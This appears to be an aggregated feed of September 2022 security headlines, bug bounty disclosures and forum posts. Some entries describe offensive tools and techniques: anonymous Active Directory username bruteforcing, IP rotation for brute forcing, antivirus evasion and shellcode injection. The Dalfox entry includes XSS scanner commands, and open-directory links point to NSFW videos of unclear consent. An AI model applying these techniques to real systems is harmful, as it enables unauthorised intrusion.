    30 Search Engines for Cybersecurity Researchers (Part 1 of 3)
    No content preview
    Write-up: JWT authentication bypass via weak signing key @ PortSwigger Academy
    No content preview
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 2
    Simple hacks! Continue reading on InfoSec Write-ups »
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 1
    How to start ethically hacking websites Continue reading on InfoSec Write-ups »
    Cool Recon techniques every hacker misses! Episode 2
    No content preview
  • Open

    ‍Hacking Smart Contracts, Android Vulnerability, RCE, Prototype Poisoning, Anti-Human Server…
    No content preview
    How I abused the file upload function to get a high severity vulnerability in Bug Bounty
    No content preview
    The terrifying world of Cross-Site Scripting (XSS) (Part 2) — StackZero
    No content preview
    Living Off The Land: Suspicious System32
    The services below are some of the most commonly abused services for malicious parties to “live of the land”. Each are built into Windows… Continue reading on InfoSec Write-ups »
    30 Search Engines for Cybersecurity Researchers (Part 2 of 3)
    No content preview
    30 Search Engines for Cybersecurity Researchers (Part 1 of 3)
    No content preview
    Write-up: JWT authentication bypass via weak signing key @ PortSwigger Academy
    No content preview
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 2
    Simple hacks! Continue reading on InfoSec Write-ups »
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 1
    How to start ethically hacking websites Continue reading on InfoSec Write-ups »
    Cool Recon techniques every hacker misses! Episode 2
    No content preview
  • Open

    Microsoft Sees No Need to Fix New Teams Vulnerability
    Article URL: https://www.thurrott.com/cloud/microsoft-365/273122/microsoft-sees-no-need-to-fix-new-teams-vulnerability Comments URL: https://news.ycombinator.com/item?id=32897138 Points: 2 # Comments: 1
  • Open

    FreeBuf早报 | 三分之一企业未加密云端敏感数据;美驻华使领馆过度采集中方雇员信息
    报告揭示,36%的企业在其云端资产中混有未加密的敏感数据,如公司秘密和个人身份信息等。
    JAVA安全基础(一)JAVA EE分层模型以及MVC框架简述
    最近刚刚开始学习java安全,在这里做一个记录,接下来会持续更新关于java安全的内容,内容如有不恰当的地方,还希望各位大佬指正。
    碰撞测试作弊假?黑客曝光特斯拉使用“特殊代码”
    黑客称,特斯拉一直在添加涉及碰撞测试机构的代码,包括刚刚测试过 Model Y 的 ANCAP 和 EuroNCAP。
    “泄露”的咖啡!黑客出售近22万名新加坡星巴克顾客数据
    该事件可能泄露了顾客姓名、性别、出生日期、手机号码、电子邮件地址、住宅地址等个人敏感信息。
    公有云攻防系列——云服务利用篇
    本文介绍了一些公有云厂商提供的云服务相关的漏洞和相关的攻击技术,说明了云服务在提供便利的同时也可能带来难以预料的风险。
    FreeBuf早报 | 美成立专门机构打击加密货币犯罪;洲际酒店遭黑客破坏性攻击
    美国司法部组建了数字资产协调人网络(Digital Asset Coordinators Network)专门打击加密货币犯罪。
  • Open

    Staying Under the Radar - PPID Spoofing and Blocking DLLs
    https://crypt0ace.github.io/posts/Staying-under-the-Radar/ submitted by /u/Potential_Waltz7400 [link] [comments]
    Crack Pre-Shared Key of WPA/WPA2 from Live Network
    submitted by /u/tbhaxor [link] [comments]
    LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed
    Here's my new tool "LDAP nom nom", which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds. As far as I know there are no logs generated for this, so detecting this requires custom network level monitoring. If you're pentesting a new environment, and don't know where to start, you can detect existence of about 10M usernames in less than 30 minutes (10K names/sec) From there on, it could be a question of looking for really dubious account names like "admintest" or "tempadmin" who might have the same password as the account name. This can be attempted by kerberoasting or direct logins (this is noisy and generates events). Reception of this small tool has been terrific, with more than 200 stars on Github in less than 24 hours, which is crazy compared to the other stuff I've released. https://github.com/lkarlslund/ldapnomnom submitted by /u/lkarlslund [link] [comments]
  • Open

    Apple doing #passwordless wrong and no one gives a flying fsck?
    Seriously? Nobody noticed that Apple broke the fundamental u2f principle "don't export keys, enroll devices when needed"? upd: It would also be a mistake to compare passkeys to "passwords you need to memorize". A comparison to passwords that were securely generated and stored in good old keychain would be more correct. Moving to webauthn as implemented by Apple eliminates the "shared secret" and thus blocks exactly three "moderately important" attack vectors: More dumb-targeted phishing attempts (regular phishing would not work because browser would not automatically fill the password on the phisher's site, so it requires manual interaction anyway, but if an evil guy manages to convince a user to override this behavior..) Browser-side leaks and malicious plugins Server-side leaks But that's all! It is not remotely as secure as properly implemented u2f. submitted by /u/arkenoi [link] [comments]
  • Open

    针对U盘文件的盗与防攻略
    作者:moyun@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/LcgSc2lNBS6iQgHO88vmKg 近年来,使用U盘作为介质完成的网络攻击屡见不鲜。 2010年的震网病毒事件,使用了基于U盘来触发的windows 快捷方式漏洞; 2014年安全研究员在BlackHat上公布了基于U盘的BadUsb攻击,该攻击也基于U盘这个介质; ...
    黑客在 Microsoft Edge 新闻源页面投放技术诈骗广告
    作者:威胁情报团队 译者:知道创宇404实验室翻译组 原文链接:https://www.malwarebytes.com/blog/threat-intelligence/2022/09/microsoft-edges-news-feed-pushes-tech-support-scam 虽然谷歌Chrome仍然是顶级浏览器,但越来越多的用户开始使用基于Chrome源代码的Microsoft...
  • Open

    针对U盘文件的盗与防攻略
    作者:moyun@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/LcgSc2lNBS6iQgHO88vmKg 近年来,使用U盘作为介质完成的网络攻击屡见不鲜。 2010年的震网病毒事件,使用了基于U盘来触发的windows 快捷方式漏洞; 2014年安全研究员在BlackHat上公布了基于U盘的BadUsb攻击,该攻击也基于U盘这个介质; ...
    黑客在 Microsoft Edge 新闻源页面投放技术诈骗广告
    作者:威胁情报团队 译者:知道创宇404实验室翻译组 原文链接:https://www.malwarebytes.com/blog/threat-intelligence/2022/09/microsoft-edges-news-feed-pushes-tech-support-scam 虽然谷歌Chrome仍然是顶级浏览器,但越来越多的用户开始使用基于Chrome源代码的Microsoft...
  • Open

    There is no rate limit for SME REGISTRATION PORTAL
    MTN Group disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1305766

  • Open

    Cellebrite Physical Analyzer Messages export
    I have an iPhone image. Can you filter (narrow) down a specific phone number and export all messages (chats, iMessage, IMs, SMS, MMS) to a single report (excel, pdf, etc.) Doesn’t seem to be a way to do this. Maybe I’m missing something. It’s either all (every item on image) or nothing. submitted by /u/hw60068n [link] [comments]
  • Open

    First CTF Writeup, Cody’s First Blog!
    I’ve been in the cyber security field for a while now, and I finally decided to start writing some sort of a blog! :) Continue reading on Medium »
    Bug Bounty { How I found an Sensitive Information Disclosure( Reconnaissance ) }
    Hello everyone, Welcome Back! Continue reading on System Weakness »
    Bug Bounty { How I found an Sensitive Information Disclosure( Reconnaissance ) }
    Hello everyone, Welcome Back! Continue reading on Medium »
    The Beautiful Art Of Finding Subdomains
    A plethora of subdomain finding tools is available on the web, leaving bounty hunters with options to choose from. But before we dive any… Continue reading on Medium »
    Cool Recon techniques every hacker misses! Episode 2
    Welcome to the 2nd Episode of Cool Recon Techniques. We are back with some more cool recon techniques which we think hackers out there… Continue reading on InfoSec Write-ups »
    Authentication Bypass — Bypass OTP Verification
    Hello everyone, I am Vignesh, a 20-year-old Security Researcher from TamilNadu, India😊. Continue reading on Medium »
    SSRF ATTACK LEADING TO AWS METADATA
    Hello folks, Continue reading on Medium »
    Exploiting Stack-based Buffer Overflow on Windows x64 | Step by Step explanation | Part-2
    Hello Security folks, Tejas here :) I hope you all are doing great. In previous writeup, we reached at the point where we were able to… Continue reading on Medium »
    Session Management Part — 2
    Let us learn some more vulnerbailities related to Sessions Continue reading on Medium »
  • Open

    duoreverse — A duo_client API wrapper for red teams
    tl;dr — duoreverse is a proof-of-concept tool red teams can leverage to conduct multiple attack techniques against a target’s Duo instance. Continue reading on Medium »
  • Open

    ldapnomnom: Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)
    submitted by /u/sanitybit [link] [comments]
    kubernetes-sec-alert: Track Kubernetes CVEs by native GitHub notifications!
    submitted by /u/mostafahussein [link] [comments]
    requests-ip-rotator: A Python library to utilize AWS API Gateway's large IP pool as a proxy to generate pseudo-infinite IPs for web scraping and brute forcing.
    submitted by /u/sanitybit [link] [comments]
    Virtual FIDO is a virtual USB device that implements the FIDO2/U2F protocol (like a YubiKey) in order to support 2FA and WebAuthN.
    submitted by /u/sanitybit [link] [comments]
  • Open

    Top OSINT sources and vishing pretexts from DEF CON’s social engineering competition
    This year, I was invited to be a judge for the vishing competition at the Social Engineering Community at DEF CON, the world’s largest… Continue reading on Medium »
    Some words about SpiderFoot…
    Igor S. Bederov Continue reading on Medium »
    SPY NEWS: 2022 — Week 37
    Summary of the espionage-related news stories for the Week 37 (September 11–18) of 2022. Continue reading on Medium »
    Methods for identifying cryptocurrency wallets in OSINT
    Igor S. Bederov Continue reading on Medium »
  • Open

    Teslas Hackers Have Found Another Unauthorized Access Vulnerability
    Article URL: https://jalopnik.com/teslas-hackers-have-found-another-unauthorized-access-v-1849535920 Comments URL: https://news.ycombinator.com/item?id=32889602 Points: 3 # Comments: 2
    A vulnerability disclosed in Profanity, an Ethereum vanity address tool
    Article URL: https://blog.1inch.io/a-vulnerability-disclosed-in-profanity-an-ethereum-vanity-address-tool-68ed7455fc8c Comments URL: https://news.ycombinator.com/item?id=32886910 Points: 2 # Comments: 0
  • Open

    dont like these folders, maybe you do. didnt look = NSFW
    everything here is 1234.mp4 (number only) in folders, like 00:1A:79:0A:FD:1A/ also, some are 10G+ http://91.219.96.148:88/media/bb2/ submitted by /u/thats_dumberst [link] [comments]
    recipes
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Best Red Teamers to follow on Twitter?
    Hello! I am a pentester making the move towards full-time red teaming soon. My twitter feed is excellent for app and bug bounty news/techniques/etc, but I am looking to diversify this and get some more red team stuff. Anything is useful. I tried to have a quick look through this subreddit for someone previously asking this but couldn't see, if there is somewhere please point me out and i'll move over there and delete this! Thanks submitted by /u/maxicorbs [link] [comments]
  • Open

    SecWiki News 2022-09-18 Review
    基于Clickhouse的下一代日志体系建设实践 by ourren eCapture旁观者:Android HTTPS明文抓包,无需CA证书 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-18 Review
    基于Clickhouse的下一代日志体系建设实践 by ourren eCapture旁观者:Android HTTPS明文抓包,无需CA证书 by 路人甲 更多最新文章,请访问SecWiki
  • Open

    Suricata - Syslog
    Hello I am reaching out as I cannot get this figured out. I have suricata installed and running on my network, and its working. There are entries in the fast.log ​ However I cannot get it to report to a syslog . I have it turned on in the yaml file, so its not that. just no syslog software is picking up the details (I have tried to many different syslog programs and nothing seems to work). I am running this on a windows machine. All i want is a way to quickly view the logs (not using fast.log) and get email alerts of priority 1 msgs ​ Thanks for any help! submitted by /u/h4X6 [link] [comments]
    How do websites block screenshots
    Hi AskNetsec, I tried to take a screenshot of a course on Udemy for a diagram and I couldn't. Udemy has this screenshot protection. I am a Senior Engineer and I would not even know how to implement this. submitted by /u/CyberStagist [link] [comments]
  • Open

    HTML Injection in email via Name field
    HackerOne disclosed a bug submitted by mega7: https://hackerone.com/reports/1581499 - Bounty: $500
  • Open

    绕过检测之Executor内存马浅析(内存马系列篇五)
    能够绕过检测的Executor内存马

  • Open

    Why do ransomware gangs only infect the business and not they're users?
    I was wondering if a hacking ring owned a network and was able to deploy ransomware all over it. Have there been any case where they went after the companies users/clients by infecting them to trough a phishing scheme or software update? submitted by /u/Lonelybiscuit07 [link] [comments]
    Evading WinDefender ATP credential-theft: kernel version
    submitted by /u/dmchell [link] [comments]
    Introduction to Threat Intelligence ETW
    submitted by /u/dmchell [link] [comments]
  • Open

    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 1
    How to start ethically hacking websites Continue reading on InfoSec Write-ups »
    How I Found My FIRST Vulnerability/Bug Bounty and How You Can Too: Part 2
    Simple hacks! Continue reading on InfoSec Write-ups »
    How I was able to bypass OTP using Response Manipulation
    $whoami Continue reading on Medium »
    Story of a reserved CVE-2022–23361
    Hello hackers, hope you guys are doing well and hunting lots of bugs. This is gonna be my first write-up, as the title says I will tell… Continue reading on Medium »
    Bug Bounty Challenge Update #1 — Bug Hacking
    Hi everyone. Continue reading on Medium »
    LDAP Injection and Why it Occurs
    WHAT IS LDAP INJECTION? Continue reading on CodeX »
    Stored XSS via Upload function at Filename parameter.
    Stored XSS bug via exploiting the filename parameter through upload function. Continue reading on Medium »
    How i made the multiple hall of fame in Nokia within 2 minutes
    HoF (HALL OF FAME) for reporting a sinlge bug on their several domains through their Nokia vulnerability disclosure Continue reading on System Weakness »
    Ookeenga Official Testnet and Bug Bounty Event — $3,000 Prize Pool
    Chieftains, we’re thrilled to announce an exciting new milestone for Ookeenga — Our Testnet is finally here! Continue reading on Medium »
  • Open

    #100DaysOfHacking Day 85
    On this Saturday we are working on a few things. Continue reading on Medium »
    Webshell vs. Defender: Evading Anti-Virus For Fun & (Not) Profit
    Introduction: This write-up touches upon basic methodology behind modifying a webshell, in order bypass detection by an Anti-Virus… Continue reading on Medium »
    The Lay of the land
    Learn about and get hands-on with common technologies and security products used in corporate environments; both host and network-based… Continue reading on Medium »
  • Open

    LLVM Passes for Security: A Brief Introduction (Part 1/4)
    submitted by /u/sanitybit [link] [comments]
    Securing the Supply Chain of Nothing
    submitted by /u/sanitybit [link] [comments]
  • Open

    SecWiki News 2022-09-17 Review
    GoTestWAF: 自动化评估Web应用程序安全 by ourren JWT认证攻击详解总结 by ourren 针对Uber被黑客攻击事件的简单分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-17 Review
    GoTestWAF: 自动化评估Web应用程序安全 by ourren JWT认证攻击详解总结 by ourren 针对Uber被黑客攻击事件的简单分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Airflow Daemon Mode Insecure Umask Privilege Escalation
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1690093 - Bounty: $2400
  • Open

    GCFA practice test to give away
    A kind person from this thread gave me their unused GCFE practice test awhile back, so I’d like to pay it forward and give away a GCFA practice test I didn’t use. What was something nice you did for someone this week? I’ll pick an answer at random to select the recipient :) submitted by /u/1239870abc [link] [comments]
  • Open

    OSINT in Metaverse?
    For understanding OSINT in metaverse, you should know what actually metaverse is. Continue reading on Medium »
  • Open

    Chat.db
    If someone had access to your your chat.db file/your apple id and login, could they alter it from a remote place? submitted by /u/Adventurous-North522 [link] [comments]
  • Open

    Small collection of Arabic music
    http://www.asmreekasounds.com/songs/mp3/arabic/ submitted by /u/Shot-Occasion418 [link] [comments]

  • Open

    Help with heap exploitation
    Hi, for example I have this code: do { buf = malloc (500); memset (buf, 0 , 500); a = recv (socket, buf, 499, 0); } while (receiveBuffer > 0) I understand the problem is that the buffer is never freed and it allocates the same buffer again and again, but I don't understand how can I use this memory leak for exploitation. Thank you very much. submitted by /u/secret1337secret [link] [comments]
  • Open

    A bunch of chain mail letters, some from the 1920s
    http://www.silcom.com/~barnowl/chain-letter/archive/%21content.html submitted by /u/Shot-Occasion418 [link] [comments]
    NSFW - loads of female masturbation videos
    http://108.185.100.229/VideoDownloader/ submitted by /u/omahajackhawk [link] [comments]
    D&D Stuff
    http://frpworld.com/downloads/ submitted by /u/c-rn [link] [comments]
    How do I stop wget from generating these files when downloading ODs?
    submitted by /u/c-rn [link] [comments]
  • Open

    Getting Paid With Just Picking Color — Bug Bounty
    Suppppp guysss, this is my first write-up about bug bounty, let me introduce myself, my name is Redza you can call me za, ja, dza, red, or… Continue reading on Medium »
    CVE-2022–37700 Directory Transversal in ZenTao Easy soft ALM v16.5
    I am Shubham Sudhir Sawant a Security Researcher, super thrilled to write my very first blog. Continue reading on Medium »
    Hacking tool details Beginners
    Anonymously Hiding Tools: Continue reading on Medium »
    Tip’s to choose a bug bounty program
    Hi everyone! I’m back with another blog, this time I realized that my blogs about bug bounty had a lot of views so I’m back with a blog… Continue reading on Medium »
    The Tale Of SSRF To RCE on .GOV Domain
    Welcome back, I hope everyone is well. Without further hesitation let’s dive into it! Continue reading on Medium »
    Your First Bug (Burp Suite)
    Cc: InsidePHD Continue reading on System Weakness »
    How I Hacked my College’s student portal
    Hey guys, I am back again with another writeup about how I found a seviour bug in my college’s student portal which leads to a data leak… Continue reading on InfoSec Write-ups »
    Information Gathering:
    gathering different kinds of information about the target. Continue reading on Medium »
    Abusing Broken Link In Fitbit (Google Acquisition)To Collect BugBounty Reports On Behalf Of Google !
    I usually track acquisitions of websites for which I am hunting bugs regularly… Continue reading on InfoSec Write-ups »
    No rate limit to SmS bombing..
    Hello everyone, Continue reading on Medium »
  • Open

    Finding PID and key@comment in core file
    I am trying to find ssh-agent key@comment in a core file. Anyone know how to find it. I have tried gdb and using ghidra but I haven’t found any useful information. Maybe I’m missing something simple? submitted by /u/Critical-Balance7980 [link] [comments]
    Forensic Imaging Software besides FTK Imager?
    What are you guys/gals using besides FTK Imager to do disk images (on live PC's or loose media) on a regular basis? Does Encase Imager even exist / is it still supported? Can only find docs and no downloads on their site post Opentext acquisition Tableau Imager is also under the Opentext acquisition, has had no updates since 2020, seems to require a forensic bridge making it unsuitable as a live imaging tool. Also does not support logical images. X-Ways is still faster than FTK Imager, but the requirement for using a dongle is a major downside. Lots of laptops out there only have one USB port and that means either X-Ways can't work or it needs a hub so worst case we are documenting changes that the hub makes in addition to artifacts from the dongle and the connected drive, and best case there's multiple USB ports but we're still documenting twice as much investigator impact as FTK imager running straight off it's own destination device. Magnet has Acquire, but this is a massive program that requires .Net libraries which are almost gauranteed not to be on your target machine if attempting a live capture, and it doesn't support making logical images, a big downside in an era with so much full disk encryption. submitted by /u/QuietForensics [link] [comments]
    UFED 4PC prices
    Hello everybody, I've been working in Computer and Mobile Forensics for about a year. I have a couple of clients a month and the business is not bad. I would like to purchase UFED 4PC or some other forensic software, especially for doing Mobile Forensics. Unfortunately, I still can't afford to spend + $ 7500 Are there any solutions? Obviously legal, to save money? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    XSS in www.glassdoor.com
    Glassdoor disclosed a bug submitted by seifelsallamy: https://hackerone.com/reports/1695989 - Bounty: $500
    SSRF via potential filter bypass with too lax local domain checking
    Nextcloud disclosed a bug submitted by tomorrowisnew_: https://hackerone.com/reports/1608039
    Last video frame is still sent after video is disabled in a call
    Nextcloud disclosed a bug submitted by daniel_calvino_sanchez: https://hackerone.com/reports/1641088
    Information exposure in in guzzlehttp/guzzle (https://github.com/nextcloud/3rdparty/tree/master/guzzlehttp/guzzle)
    Nextcloud disclosed a bug submitted by ro0telqayser: https://hackerone.com/reports/1604606
  • Open

    cloudvelo: An experimental Velociraptor implementation using cloud infrastructure
    submitted by /u/sanitybit [link] [comments]
    DylibHijackTest: Discover DYLD_INSERT_LIBRARIES hijacks on macOS
    submitted by /u/sanitybit [link] [comments]
    A Basic Guide to iOS Testing in 2022
    submitted by /u/sanitybit [link] [comments]
    Jetty Features for Hacking Web Apps
    submitted by /u/sanitybit [link] [comments]
    Staged Payloads from Kali Linux | PT Phone Home – DNS
    submitted by /u/sanitybit [link] [comments]
    Uber hacked, internal systems breached and vulnerability reports stolen
    submitted by /u/Fugitif [link] [comments]
    Cloning internal Google repos for fun and… info?
    submitted by /u/lukeberner [link] [comments]
    Undermining Microsoft Teams Security by Mining Tokens
    submitted by /u/flexibeast [link] [comments]
  • Open

    Investigating violent & distressing content as part of OSINT investigations
    Working on OSINT investigations can be a fun and thoroughly rewarding activity that anyone can contribute to. Continue reading on Medium »
  • Open

    Uber hacked, internal systems breached and vulnerability reports stolen
    Article URL: https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/ Comments URL: https://news.ycombinator.com/item?id=32869450 Points: 4 # Comments: 1
    Vulnerability allows access to credentials in Microsoft Teams
    Article URL: https://www.scmagazine.com/analysis/cloud-security/vulnerability-allows-access-to-credentials-in-microsoft-teams Comments URL: https://news.ycombinator.com/item?id=32866108 Points: 1 # Comments: 1
    Token storage vulnerability in MS Teams
    Article URL: https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens Comments URL: https://news.ycombinator.com/item?id=32864203 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-09-16 Review
    NPM 供应链安全最佳实践指南 by 路人甲 Gitlab常见漏洞复现及后利用 by 路人甲 SEVulDet:基于语义增强的系统漏洞挖掘器 by ourren 一文区分个人信息、敏感个人信息和隐私信息 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-16 Review
    NPM 供应链安全最佳实践指南 by 路人甲 Gitlab常见漏洞复现及后利用 by 路人甲 SEVulDet:基于语义增强的系统漏洞挖掘器 by ourren 一文区分个人信息、敏感个人信息和隐私信息 by ourren 更多最新文章,请访问SecWiki
  • Open

    EarlyBird Shellcode Injection in C#
    https://crypt0ace.github.io/posts/Shellcode-Injection-Techniques-Part-3/ submitted by /u/Potential_Waltz7400 [link] [comments]
    Recording on site
    As a pentester, I sometimes have to go on site to look for physical / social vulnerabilities. I'm currently using a gopro and just started experimenting with a voice recorder (Philips DVT2810). However, the go pro isn't very stealthy. The voice recorder is invisible in my pocket, but wasn't picking up conversations the way I hoped and is lacking video evidence of course. What do you use to record when it needs to be stealthy? Edit: some people pointed out that this might be illegal. In my country it’s allowed as long as I’m part of the conversation. submitted by /u/Amtrox [link] [comments]
    question regarding win10 privilege escalation without cmd or powershell
    currently doing a ctf challenge where you need to unencrypt a heavily locked down drive encrypted with bitlocker. i've done some tinkering and i think i've landed on a solution involving using a powershell privilege escalation exploit to create a new admin user, logging in to it and disabling bitlocker from the control panel. however, part of the exercise involves both powershell and the command prompt being but behind a blacklist, meaning i can't use something like powershdll to run powershell scripts from cmd. is there any other way to do this? or is my approach to this problem completely wrong? submitted by /u/Xianthu_Exists [link] [comments]
    Looking for thoughts, advice, or known prior art of building an alternative to hooking: behavior baseline by predicting a limited subset of machine code's probable control flow in memory at runtime.
    Hooking is pretty easy to beat. It's efficient, low overhead, but unreliable. It also results in very low resolution scrutiny of program behavior. I think I have an idea, not to replace hooking, but maybe add a more resilient redundant behavior analysis mechanism. Computational overhead is my primary concern, and also I'm unsure how often you can halt a process's normal execution flow to do this without noticeable performance impact. To be honest, I'm actually not even sure how, without implementing this in the kernel, you would, at some interval, redirect the instruction pointer to your analysis code (by force, not by hooking) and also protect it from attacker modification. But I think the idea itself is interesting enough to be discussion-worthy. I think the defender's best option to de…
  • Open

    Social Engineering simply explained.
    1. What is Social Engineering? Continue reading on Medium »
  • Open

    Zero-Day Exploit Detection Using Machine Learning
    Deep learning models can help defenders improve zero-day exploit detection. We provide case studies focused on command injection and SQL injection. The post Zero-Day Exploit Detection Using Machine Learning appeared first on Unit 42.
  • Open

    FreeBuf周报 | 《网络安全法》将迎来修改;乌克兰网络攻击瘫痪俄罗斯2400个网站
    我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    网安大国系列 | 澳大利亚:来自大洋孤岛的隐忧
    四面环海的地理属性以及远离任何强大同盟的地缘政治因素,澳大利亚似乎向来对周遭环境颇为敏感,网络空间也不例外。
    新的恶意软件包通过YouTube视频自我传播
    一个新的恶意软件包利用受害者YouTube频道自我传播。
    攻击溯源的成本与难度 | FreeBuf甲方群话题讨论
    作为安全事件发生后,进行事后响应的重要组成部分,攻击溯源有助于企业在一定程度上还原攻击者路径及攻击手法,并以此加强自身防御,尽量避免二次攻击的发生。但在实际操作中,溯源的难度、时间的可控性等往往难以估量,甚至还会带来不小的内部损耗,但面对有时不得不做的溯源,企业应该如何评估考量?该从哪些方面提升溯源效率,本期话题我们就以企业进行攻击溯源为话题,对相关问题展开讨论。
    全国信安标委发布《信息安全技术 网络数据分类分级要求》(征求意见稿)
    《分类分级要求》给出了数据分类分级的原则和方法,包括数据分类分级基本原则、数据分类框架和方法、数据分级框架和方法等。
    借悼念伊丽莎白二世女王之名,攻击者发起大规模网络钓鱼攻击
    安全研究人员发现,以“女王去世”、“哀悼女王”等为诱饵的网络钓鱼攻击呈现持续上升的趋势。
  • Open

    How to investigate logs after Wordpress compromise
    Hi, I am trying to figure how my wordpress site has been hacked (index.php replaced with some nasty code). Comparing with backups, I can determine that this happened after yesterday 11pm, since in that backup index.php was clean. What should I search in apache logs? POST request? I have no suspicious logins in FTP or cPanel or Wordpress backend, so I assume they hacked through some vulnerable plugin/theme. Thank you! submitted by /u/g-simon [link] [comments]
    Why does mimikatz use :: when it was written in C?
    According to the mimikatz author, Benjamin Delpy (gentilkiwi) at https://github.com/gentilkiwi/mimikatz; mimikatz is a tool I've made to learn C ... I'm not a programmer and can't stop thinking about it, so I google it and found :: actually used in C++ and not C as discussed at quora https://www.quora.com/What-does-mean-in-C-programming-2 The :: operator is the C++ scope resolution operator. It has no meaning in C. C and C++ are different languages. My question is why does mimikatz use :: and not argument or flag just like any other program? submitted by /u/w0lfcat [link] [comments]
    Open source vs. Closed source
    I've been reading an article about how an redis commander exploit can lead to database leakage ( https://blog.criminalip.io/2022/09/06/redis-database-leaks/ ) and I was wondering whether the general rule of thumb is that open source projects are more vulnerable to data breaches because they have exposed code? I've been receiving mixed answers so I'd appreciate any/all insight, thanks. submitted by /u/cheeztoshobo [link] [comments]
  • Open

    Dalfox 2.8 Release 🚀
    Hi hackers! Dalfox v2.8 has been released 🚀 There are not many added features this release. But it’s better than before, so I recommend an update :D Thank you ❤️ First, Thank you so much all contributors !! Release note Github | DockerHub | GHCR New Add --report and --report-format flags Improve PA(Parameter Analyasis) Logic inJS Scan HAR format supported (FILE Mode) Improve FILE/PIPE Banner Improve JSON Printing And Fixed Bugs Report Flags You can now view the pretty results through the --report flag. dalfox url https://xss-game.appspot.com/level1/frame --report And you can choice report style with --report-format flag. dalfox url https://xss-game.appspot.com/level1/frame --report --report-format json Result Object ParamResult is now added to the Result. In addition to the actual XSS results, you can handle Parameter Analysis results. type Result struct { Logs []string `json:"logs"` PoCs []PoC `json:"pocs"` Params []ParamResult `json:"params"` Duration time.Duration `json:"duration"` StartTime time.Time `json:"start_time"` EndTime time.Time `json:"end_time"` } type ParamResult struct { Name string Type string Reflected bool ReflectedPoint string ReflectedCode string Chars []string } Sample code package main import ( "fmt" "encoding/json" dalfox "github.com/hahwul/dalfox/v2/lib" ) func main() { opt := dalfox.Options{ Cookie: "ABCD=1234", } result, err := dalfox.NewScan(dalfox.Target{ URL: "https://xss-game.appspot.com/level1/frame", Method: "GET", Options: opt, }) if err != nil...

  • Open

    All about: Open Redirects
    Sites often use HTTP or URL parameters to redirect users to a specified URL without any user action. While this behavior can be useful, it… Continue reading on Medium »
    Network Segmentation PenTesting
    — — — — —-— — — — — Happy Engineer`s Day — — — — — — — — — — Continue reading on Medium »
    ARTEMIS: TAEBIT’s first bug bounty program
    Welcome aboard AstroNut 👨‍🚀👩🏻‍🚀🧑🏽‍🚀 Continue reading on Medium »
  • Open

    ODSHOT ! Would you like to get it back !
    Several years ago, an up-to-date list of all the working dirs of this sub from its start, was regularly shared here. Would you like to restart this adventure ? View Poll submitted by /u/SubliminalPoet [link] [comments]
    Open Directory Index
    I've created an index site. I have indexed the last couple months worth of shared ODs, as well as some of my own finds. I would like to get your guys feedback on it. Just before the comments start to flow: I know the look and feel isn't great, but I've coded it all myself without any templates and I am no designer. I know the search is a little bit slow. I've been playing with indexes on my sql tables to see if that helps. I know ODCrawler looks way better and searches way faster. This is a new experiment for me as a new developer so please be easy. With that said I welcome all constructive feedback. So far I have personally used this index to watch multiple movies and find some roms. Let me know if you able to find anything useful or see any value in what I am doing here. Additionally, if you want to submit and OD for me to index please feel free. I have 4 worker nodes actively indexing submitted urls. https://opendirindex.opensho.com/index.php submitted by /u/coldmateplus [link] [comments]
  • Open

    OFAC Sanctions update 14.09.22
    Additional 2 individuals have been added to the OFAC Sanctioned list as of 14.09.2022. Those two individuals are suspected of processing… Continue reading on Medium »
  • Open

    store internal email disclosed through shopify-data-exporter
    Shopify disclosed a bug submitted by xenx: https://hackerone.com/reports/1605962 - Bounty: $500
    [hta3] Remote Code Execution on https:// via improper access control to SCORM Zip upload/import
    U.S. Dept Of Defense disclosed a bug submitted by cdl: https://hackerone.com/reports/1122791 - Bounty: $2000
    No validation to Image upload user can upload ( php APK zip files and can be used as storage purpose)
    Linktree disclosed a bug submitted by bug_vs_me: https://hackerone.com/reports/1644062 - Bounty: $750
  • Open

    Magento Supply Chain Attack Targets Extension Developer FishPig
    Magento store owners using the popular FishPig extensions should be wary of a recent supply chain attack which compromised their software repository. FishPig released a detailed security announcement on September 13th, 2022. The attack is estimated to have occurred on or before August 19th of this year so any eCommerce stores which have installed FishPig extensions since this date have likely been compromised. Website administrators should completely remove, reinstall, and upgrade all instances of FishPig software present within their environment and check their systems for any signs of infection. Continue reading Magento Supply Chain Attack Targets Extension Developer FishPig at Sucuri Blog.
  • Open

    NPM Malware Targeting HubSpot’s Bucky Client
    submitted by /u/louis11 [link] [comments]
    CVE North Stars: Leverage CVEs to kickstart your next vulnerability hunting adventure
    submitted by /u/onlinereadme [link] [comments]
    The Blind Spots of BloodHound
    submitted by /u/0xfffffg [link] [comments]
    Getting started with gVisor support in Falco
    submitted by /u/vjjmiras [link] [comments]
    A Detailed Analysis of the Quantum Ransomware [PDF]
    submitted by /u/CyberMasterV [link] [comments]
    Buffer overflow in the OpenRazer open-source kernel drivers causing denial of service and privilege escalation.
    submitted by /u/jat0369 [link] [comments]
    Security Advisory: NETGEAR Routers FunJSQ Vulnerabilities
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Traces of Windows remote command execution
    submitted by /u/jeandrew [link] [comments]
    It pays to be Circomspect
    submitted by /u/Gallus [link] [comments]
  • Open

